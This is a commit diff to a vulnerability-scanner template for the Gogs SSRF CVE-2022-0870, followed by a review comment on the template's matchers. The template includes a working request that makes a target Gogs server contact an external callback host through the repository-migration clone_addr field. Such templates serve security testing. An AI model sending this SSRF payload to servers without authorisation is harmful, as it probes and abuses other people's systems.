updated matcher,tags

patch-1
Ritik Chaddha 2023-03-18 00:47:03 +05:30 committed by GitHub
parent f9ffbd2c38
commit 7e2a3f4d4a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 3 deletions


@ -1,8 +1,8 @@
id: CVE-2022-0870
info:
name: Gogs < 0.12.5- Server-Side Request Forgery (SSRF)
author: theamanrawat, Akincibor
name: Gogs < 0.12.5 - Server Side Request Forgery
author: theamanrawat,Akincibor
severity: medium
description: |
Server-Side Request Forgery (SSRF) in GitHub repository gogs/gogs prior to 0.12.5.
@ -17,7 +17,7 @@ info:
cwe-id: CWE-918
metadata:
verified: "true"
tags: cve,cve2022,ssrf,gogs,auth
tags: cve,cve2022,ssrf,gogs,authenticated
requests:
- raw:
@ -44,6 +44,7 @@ requests:
_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
@ -51,6 +52,11 @@ requests:
- "dns"
- "http"
- type: word
part: body_1
words:
- 'content="Gogs'
extractors:
- type: regex
name: csrf
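Review bot: The added `body_1` word matcher (`content="Gogs`) confirms the product but not the version, so under `matchers-condition: and` the template still reports any Gogs instance whose migration request reaches the interactsh host. Because `clone_addr` points at an external host, a callback probably shows only that repository migration is enabled, which a release at or after 0.12.5 may also allow, so a hit needs the version confirmed before it is reported as CVE-2022-0870. I would state that next to the matcher, e.g. `# fingerprint only: confirms Gogs, not that the version is below 0.12.5`, or add a version check if the first response exposes one. The interactsh matcher lists `dns` and `http` with no visible `condition`, so by default a bare name lookup satisfies it; requiring `http` would tie the finding to an actual outbound request. The first request and the rest of the `extractors` block are outside the visible hunks.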